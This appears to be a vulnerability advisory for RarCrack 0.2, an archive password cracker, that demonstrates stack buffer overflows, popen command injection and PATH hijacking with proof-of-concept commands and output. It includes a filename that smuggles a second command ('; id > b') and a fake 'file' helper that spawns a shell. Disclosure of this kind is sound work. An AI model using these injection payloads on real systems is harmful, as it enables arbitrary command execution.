RarCrack!

RarCrack! is a simple brute-force password cracker for archives. RarCrack! contains several unsafe coding practices that can lead to security problems, e.g. when it is invoked by or embedded in other programs.

Buffer overflow: filename parameter (the overflow is caught by FORTIFY_SOURCE, which aborts the process instead of letting it continue)

$ /usr/bin/rarcrack $(python3 -c 'print("A"*500)')
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)

*** buffer overflow detected ***: /usr/bin/rarcrack terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bfb)[0x7faa1c861bfb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7faa1c8ea1f7]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7330)[0x7faa1c8e8330]
/lib/x86_64-linux-gnu/libc.so.6(+0xf6692)[0x7faa1c8e7692]
/usr/bin/rarcrack(+0x2477)[0x55565707e477]
/usr/bin/rarcrack(+0x1481)[0x55565707d481]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7faa1c8112e1]
/usr/bin/rarcrack(+0x14fa)[0x55565707d4fa]
...

Buffer overflow: type parameter (not caught; the register dump below shows rbp and r12–r15 filled with 0x41 bytes from the oversized argument before the SIGSEGV)

$ gdb -ex=r --args /usr/bin/rarcrack --type $(python3 -c 'print("A"*400)')
...
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)

WARNING: invalid parameter --type AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
ERROR: The specified file () is not exists or
       you don't have a right permissions!

Program received signal SIGSEGV, Segmentation fault.
0x000055555555644d in ?? ()
(gdb) i r
rax            0x2b     43
rbx            0x4141414141414141       4702111234474983745
rcx            0x7ffff753d730   140737342854960
rdx            0x7ffff77fd760   140737345738592
rsi            0x55555576ac20   93824994421792
rdi            0x0      0
rbp            0x4141414141414141       0x4141414141414141
rsp            0x7fffffffe3a8   0x7fffffffe3a8
r8             0x7ffff7fccd00   140737353927936
r9             0x2f     47
r10            0x73     115
r11            0x246    582
r12            0x4141414141414141       4702111234474983745
r13            0x4141414141414141       4702111234474983745
r14            0x4141414141414141       4702111234474983745
r15            0x4141414141414141       4702111234474983745
rip            0x55555555644d   0x55555555644d
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0

Command injection: passing strings directly into popen. RarCrack! builds the shell command for the external `file` utility by concatenating the user-supplied filename unescaped, so shell metacharacters in the filename are executed by the shell.

$ export c='; id > b' && touch "$c"  && /usr/bin/rarcrack "$c" && cat b
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)

Usage: file [-bcEhikLlNnprsvzZ0] [--apple] [--extension] [--mime-encoding] [--mime-type]
            [-e testname] [-F separator] [-f namefile] [-m magicfiles] file ...
       file -C [-m magicfiles]
       file [--help]
INFO: detected file type:
ERROR: Couldn't detect archive type
uid=1002(pwn) gid=1002(pwn) groups=1002(pwn)

Command injection: by trusting $PATH. RarCrack! locates its external helper (`file`) through $PATH rather than an absolute path, so a caller-controlled $PATH substitutes an arbitrary program for it.

$ echo -e '#!/bin/sh\n/bin/sh 1>&2' > file && chmod +x file && PATH=$(pwd) /usr/bin/rarcrack /usr/bin/rarcrack
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)

$ /usr/bin/id
uid=1002(pwn) gid=1002(pwn) groups=1002(pwn)